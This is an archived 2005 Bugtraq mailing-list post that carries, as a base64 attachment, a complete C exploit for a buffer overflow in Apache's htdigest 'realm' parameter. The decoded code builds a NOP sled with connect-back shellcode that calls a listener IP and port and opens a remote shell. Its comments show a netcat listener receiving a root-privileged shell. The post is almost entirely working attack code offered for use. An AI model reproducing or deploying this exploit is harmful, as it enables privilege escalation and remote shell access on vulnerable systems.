htdigest exploit code [bid 13537]
From: "K sPecial" <kspecial@linuxmail.org.>
To: bugtraq@securityfocus.com, vuldb@securityfocus.com
Date: Fri, 13 May 2005 04:04:14 +0800
Subject: htdigest exploit code [bid 13537]
X-Originating-Ip: 71.0.123.60
X-Originating-Server: ws5-1.us4.outblaze.com
Message-Id: <20050512200414.DFAEE203EE@ws5-1.us4.outblaze.com.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
This is a multi-part message in MIME format.
--_----------=_111592825417000
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="iso-8859-1"
here it is (as an attachment as requested)
--K-sPecial
--_----------=_111592825417000
Content-Disposition: attachment; filename="htdigest-realm-bof.c"
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream; name="htdigest-realm-bof.c"
LyoKICogaHRkaWdlc3QtcmVhbG0tYm9mLmMgYnkgSy1zUGVjaWFsIDUtMTEt
MjAwNSB7IGlyYzovL2lyYy54enppcm96Lm5ldCB9CiAqCiAqIGV4cGxvaXQg
Zm9yIGh0ZGlnZXN0ICdyZWFsbScgcGFyYW1ldGVyIG92ZXJmbG93OyBub3Qg
c3VyZSBvbiB2ZXJzaW9ucywgc2VlbXMgdG8gYmUgPD0gMS4zLjI3IDw9IDIu
MC41MgogKiBodHRwOi8vd3d3LnNlY3VyaXRlYW0uY29tL3VuaXhmb2N1cy81
RVAwNjFGRUtDLmh0bWwKICogCiAqIGNvbXBpbGUgd2l0aDogZ2NjIC1vIGh0
ZGlnZXN0LXJlYWxtLWJvZiBodGRpZ2VzdC1yZWFsbS1ib2YuYyAtc3RkPWM5
OQogKiAKICogT25lIHRoaW5nIHRvIG5vdGUsIGFwYWNoZSBzZWVtcyB0byBo
YXZlIGh0ZGlnZXN0IGdvaW5nIG9uIHF1aXRlIG9kZCwgdGhpcyBjb2RlIHdh
cyB3cml0dGVuCiAqIGZvciB0aGUgdmVyc2lvbiB0aGF0IHRoZSBodGRpZ2Vz
dCBzaCBzY3JpcHQgbGlua3MgdG9nZXRoZXIsIGRlYmlhbiBzZWVtcyB0byBp
bnN0YWxsIHRoZSBhY3R1YWwgYmluYXJ5LAogKiBzbyB0aGVzZSBtaWdodCBu
b3QgYmUgY29tcGF0aWJsZS4gQWxzbyB0byBub3RlLCB0aGlzIGNvZGUgd2Fz
IHRlc3RlZCBhbmQgY3JlYXRlZCB1c2luZyB0aGUgaHRkaWdlc3QgCiAqIHNj
cmlwdC9sdC1odGRpZ2VzdCB0aGF0IGNvbWVzIHdpdGggYXBhY2hlIDIuMC41
MgogKgogKiBrc3BlY2lhbEB4enppcm96Oi91c3Ivc3JjL2h0dHBkLTIuMC41
Mi9zdXBwb3J0JCAuL2h0ZGlnZXN0IC1jIGZpbGUgYC4vaHRkaWdlc3QtcmVh
bG0tYm9mYCB1c2VyCiAqIEFkZGluZyBwYXNzd29yZCBmb3IgdXNlciBpbiBy
ZWFsbSCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkDHAMdsxyVGxUbFRsVGJ4bOwZs2A
icIxwDHJUVFoZmg5sWZRieezU1dSieGzsGbNgDHJOcF0McCwzYAxwLA/idPN
gDHAsD+J07HNgDHAsD+J07HNgDHAMdJQaG4vc2hoLy9iaYnjUFOJ4bAKICog
ICAgICAgIM2AMcCwzYDd+v+/3fr/v936/7/d+v+/3fr/v936/7/d+v+/3fr/
v936/7/d+v+/3fr/v936/7/d+v+/3fr/v936/7/d+v+/LgogKiAgICAgICAg
XltbPzE7MmNOZXcgcGFzc3dvcmQ6IAogKiAgICAgICAgUmUtdHlwZSBuZXcg
cGFzc3dvcmQ6IAogKiAgICAgICAgCiAqIGtzcGVjaWFsQHh6emlyb3o6fiQg
bmMgLWx2cCAxMzM3CiAqIGxpc3RlbmluZyBvbiBbYW55XSAxMzM3IC4uLgog
KiAxMjcuMS4xLjE6IGludmVyc2UgaG9zdCBsb29rdXAgZmFpbGVkOiBVbmtu
b3duIGhvc3QKICogY29ubmVjdCB0byBbMTI3LjEuMS4xXSBmcm9tIChVTktO
T1dOKSBbMTI3LjEuMS4xXSAyOTY1CiAqIGlkCiAqIHVpZD0xMDAwKGtzcGVj
aWFsKSBnaWQ9MTAwMChrc3BlY2lhbCkgZXVpZD0wKHJvb3QpIGdyb3Vwcz0x
MDAodXNlcnMpLDEwMDAoa3NwZWNpYWwpLDEwMDIobWVkaWEpCiAqCiAqCiAq
IE9mIGNvdXJzZSB0aGUgYmluYXJ5IGlzIG5vdCBzZXR1aWQgYnkgZGVmYXVs
dC4gVGhpcyBwbG9pdCBjb3VsZCBiZSBwb3NzaWJseSB1c2VmdWwgdG8gZ2Fp
biBhCiAqIHNoZWxsIHdoZW4gaHRkaWdlc3QgaXMgYmVpbmcgcmFuIHRocm91
Z2ggYSBDR0kgc2NyaXB0LgoqLwojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1
ZGUgPHN0cmluZy5oPgojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+CgovKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKiovCgojZGVmaW5lIElQICIx
MjcuMS4xLjEiCiNkZWZpbmUgUE9SVCAxMzM3Cgp1bnNpZ25lZCBpbnQgYWRk
eXNbXSA9IHsgMHhiZmZmZmFkZCwgLy8gZGViaWFuIDMuMQoJCQl9OwovLyB3
aGljaCBhZGRyZXNzIHRvIHVzZQojZGVmaW5lIEFERFkgMAoKLyoqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKiovCgoKLy8gUG9pbnQgT2YgRUlQ
IC0gVGhlIGFtbW91bnQgb2YgZGF0YSB3ZSBtdXN0IHdyaXRlIHRvIGNvbXBs
ZXRlbHkgb3ZlcmZsb3cgZWlwCiNkZWZpbmUgUE9FIDM5NQoKLy8gbmV0cmlj
IGNhbGxiYWNrIHNoZWxsY29kZQpjaGFyIGNiW10gPSAKCSJceDMxXHhjMFx4
MzFceGRiXHgzMVx4YzlceDUxXHhiMSIKCSJceDA2XHg1MVx4YjFceDAxXHg1
MVx4YjFceDAyXHg1MSIKCSJceDg5XHhlMVx4YjNceDAxXHhiMFx4NjZceGNk
XHg4MCIKCSJceDg5XHhjMlx4MzFceGMwXHgzMVx4YzlceDUxXHg1MSIKCSJc
eDY4XHg0MVx4NDJceDQzXHg0NFx4NjZceDY4XHhiMCIKCSJceGVmXHhiMVx4
MDJceDY2XHg1MVx4ODlceGU3XHhiMyIKCSJceDEwXHg1M1x4NTdceDUyXHg4
OVx4ZTFceGIzXHgwMyIKCSJceGIwXHg2Nlx4Y2RceDgwXHgzMVx4YzlceDM5
XHhjMSIKCSJceDc0XHgwNlx4MzFceGMwXHhiMFx4MDFceGNkXHg4MCIKCSJc
eDMxXHhjMFx4YjBceDNmXHg4OVx4ZDNceGNkXHg4MCIKCSJceDMxXHhjMFx4
YjBceDNmXHg4OVx4ZDNceGIxXHgwMSIKCSJceGNkXHg4MFx4MzFceGMwXHhi
MFx4M2ZceDg5XHhkMyIKCSJceGIxXHgwMlx4Y2RceDgwXHgzMVx4YzBceDMx
XHhkMiIKCSJceDUwXHg2OFx4NmVceDJmXHg3M1x4NjhceDY4XHgyZiIKCSJc
eDJmXHg2Mlx4NjlceDg5XHhlM1x4NTBceDUzXHg4OSIKCSJceGUxXHhiMFx4
MGJceGNkXHg4MFx4MzFceGMwXHhiMCIKCSJceDAxXHhjZFx4ODAiOwoKI2Rl
ZmluZSBJUF9PRkZTRVQJMzMKI2RlZmluZSBQT1JUX09GRlNFVCAgICAgMzkK
CnZvaWQgY2hhbmdlaXAoY2hhciAqaXApOwp2b2lkIGNoYW5nZXBvcnQoY2hh
ciAqY29kZSwgaW50IHBvcnQsIGludCBvZmZzZXQpOwoKaW50IG1haW4gKHZv
aWQpIHsgCgljaGFyIGJ1ZmZbNDE2XTsKCWludCBhOwoKCWNoYW5nZWlwKElQ
KTsKCWNoYW5nZXBvcnQoY2IsIFBPUlQsIFBPUlRfT0ZGU0VUKTsKCQoJZm9y
IChhID0gMDsgYSA8IDIwMDsgYSsrKSAKCQkqKGJ1ZmYrYSkgPSAweDkwOwoK
CWZvciAoaW50IGIgPSAwOyAqKGNiK2IpOyBhKyssIGIrKykKCQkqKGJ1ZmYr
YSkgPSAqKGNiK2IpOwoJCglmb3IgKDsgYSArIDQgPD0gUE9FOyBhICs9IDQp
CgkJbWVtY3B5KGJ1ZmYrYSwgKGFkZHlzK0FERFkpLCA0KTsKCQoJKihidWZm
K2EpID0gMDsKCglmd3JpdGUoYnVmZiwgc3RybGVuKGJ1ZmYpLCAxLCBzdGRv
dXQpOwoJcmV0dXJuKDApOwp9CgkJCi8vIHJpcHBlZCBmcm9tIHNvbWUgb2Yg
c25vb3EncyBjb2RlCnZvaWQgY2hhbmdlaXAoY2hhciAqaXApIHsKICAgICAg
ICBjaGFyICpwdHI7CiAgICAgICAgcHRyPWNiK0lQX09GRlNFVDsKICAgICAg
ICAvKiBBc3N1bWUgTGl0dGxlLUVuZGlhbmVzcy4uLi4gKi8KICAgICAgICAq
KChsb25nICopcHRyKT1pbmV0X2FkZHIoaXApOwp9CgovLyByaXBwZWQgZnJv
bSBzb21lIG9mIHNub29xJ3MgY29kZQp2b2lkIGNoYW5nZXBvcnQoY2hhciAq
Y29kZSwgaW50IHBvcnQsIGludCBvZmZzZXQpIHsKCWNoYXIgKnB0cjsKCXB0
cj1jb2RlK29mZnNldDsKCS8qIEFzc3VtZSBMaXR0bGUtRW5kaWFuZXNzLi4u
LiAqLwoJKnB0cisrPShjaGFyKSgocG9ydD4+OCkmMHhmZik7CgkqcHRyKys9
KGNoYXIpKHBvcnQmMHhmZik7Cn0JCgkKCQoJCgkJICAgICAgCg==
--_----------=_111592825417000--
